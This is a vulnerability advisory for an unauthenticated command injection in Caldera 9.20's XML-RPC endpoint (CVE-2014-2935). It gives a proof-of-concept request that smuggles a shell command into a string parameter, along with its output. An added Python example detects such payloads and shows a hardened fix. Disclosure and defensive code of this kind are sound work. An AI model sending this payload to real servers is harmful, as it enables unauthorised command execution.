Release date:
Updated on: 2014-05-10
Affected Systems:
Caldera 9.20
Description:
--------------------------------------------------------------------------------
Bugtraq id: 67252
CVE (CAN) ID: CVE-2014-2935
Caldera is RIP, color management, and workflow software.
Caldera 9.20 and earlier versions do not correctly sanitize certain elements that are passed into an OS command; the '/costview3/xmlrpc_server/xmlrpc.php' script therefore has a command execution vulnerability. A remote user without authentication can trigger this vulnerability by submitting a specially crafted XML-RPC request, resulting in the execution of OS commands.
<* Source: Thomas Fischer, Markus Wulftange
Link: http://www.kb.cert.org/vuls/id/693092
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
Example:
$ cat get_cutter_tools.xml
<?xml version="1.0"?>
<methodCall>
<methodName>xmlrpc.get_cutter_tools_xmlrpc</methodName>
<params>
<param><value><string>cutter_name</string></value></param>
<param><value><string>; echo "&lt;CalderaInfo>&lt;methods>&lt;item>&lt;type>'id'&lt;/type>&lt;/item>&lt;/methods>&lt;/CalderaInfo>"</string></value></param>
</params>
</methodCall>
$ curl --data @get_cutter_tools.xml http://
<?xml version="1.0"?>
<methodResponse>
<params>
<param>
<value><struct>
<member><name>get_cutter_tools_xmlrpc</name>
<value><array>
<data>
<value><string>uid=1002(caldera) gid=1001(caldera) groups=1001(caldera),4(adm),7(lp),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),46(plugdev),103(fuse),104(bytes),109(netdev)</string></value>
</data>
</array></value>
</member>
</struct></value>
</param>
</params>
</methodResponse>
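The root cause stated in the description (a string parameter that reaches an OS command without sanitization) and the request shape shown in the test method, as an added Python example that is not part of the advisory and not Caldera's own code: it parses an XML-RPC methodCall, flags string parameters that carry shell metacharacters (a detection and input-validation check a defender can run over such requests), and contrasts the vulnerable string-concatenation pattern with an allowlisted argument vector that is executed without a shell. The two sample requests, the cutter name zund_g3, the allowlist regex and the tool path /opt/hypothetical/cutter_tool are constructed assumptions for illustration.

```python
import re
import shlex
import xml.etree.ElementTree as ET

# Constructed sample requests (not captured traffic). The second one has the
# shape of the advisory's PoC: a string parameter that begins with ';' so that
# a shell would treat the rest of the value as a second command.
BENIGN_REQUEST = """<?xml version="1.0"?>
<methodCall>
<methodName>xmlrpc.get_cutter_tools_xmlrpc</methodName>
<params>
<param><value><string>cutter_name</string></value></param>
<param><value><string>zund_g3</string></value></param>
</params>
</methodCall>"""

INJECTED_REQUEST = """<?xml version="1.0"?>
<methodCall>
<methodName>xmlrpc.get_cutter_tools_xmlrpc</methodName>
<params>
<param><value><string>cutter_name</string></value></param>
<param><value><string>; echo "&lt;CalderaInfo>&lt;methods>&lt;item>&lt;type>'id'&lt;/type>&lt;/item>&lt;/methods>&lt;/CalderaInfo>"</string></value></param>
</params>
</methodCall>"""

# Characters that let a value escape a shell word or chain commands.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\\'\"]")

# A cutter name is an identifier; anything else is rejected before it gets
# near a command line (hypothetical allowlist, not Caldera's own rule).
CUTTER_NAME = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")

# Hypothetical helper binary standing in for whatever xmlrpc.php invokes.
CUTTER_TOOL = "/opt/hypothetical/cutter_tool"


def xmlrpc_string_params(xml_text):
    """Return (methodName, [string params]) of an XML-RPC methodCall."""
    root = ET.fromstring(xml_text)
    if root.tag != "methodCall":
        raise ValueError("not an XML-RPC methodCall")
    method = root.findtext("methodName", default="")
    params = [e.text or "" for e in root.iterfind("params/param/value/string")]
    return method, params


def audit_request(xml_text):
    """Detection view: (param index, value) pairs carrying shell metacharacters."""
    _, params = xmlrpc_string_params(xml_text)
    return [(i, p) for i, p in enumerate(params) if SHELL_META.search(p)]


def unsafe_command_line(cutter_name):
    """VULNERABLE pattern (illustration only): the parameter is concatenated
    into a shell command string. Run through a shell, a value that starts with
    ';' terminates the intended command and the remainder runs as a second one.
    Never hand a string like this to system() or subprocess with shell=True."""
    return f"{CUTTER_TOOL} --name {cutter_name}"


def safe_argv(cutter_name):
    """Hardened pattern: allowlist-validate the parameter, then build an
    argument vector for subprocess.run(argv) with no shell, so no
    metacharacter in the value is ever interpreted."""
    if not CUTTER_NAME.match(cutter_name):
        # shlex.quote keeps the rejected value from mangling log lines.
        raise ValueError("cutter_name rejected: %s" % shlex.quote(cutter_name))
    return [CUTTER_TOOL, "--name", cutter_name]


if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("injected", INJECTED_REQUEST)):
        method, params = xmlrpc_string_params(req)
        print(label, method, "findings:", audit_request(req))
        try:
            print("  argv:", safe_argv(params[1]))
        except ValueError as exc:
            print("  rejected:", exc)
```

The audit function is the piece to put in front of such an endpoint or to run over logged request bodies: it reports the benign request as clean and points at parameter 1 of the injected one. The argv builder shows the fix the advisory's description implies: validate the value against what a cutter name can legitimately contain and never let it pass through a shell, rather than trying to strip individual characters after the fact.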
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Caldera
-------
Currently, the vendor has not provided a patch or upgrade. Users of the software are advised to monitor the vendor's homepage to obtain the latest version:
http://www.caldera.com/support/
http://www.caldera.com/product/version-9-20/
http://www.caldera.com/product/options/costview/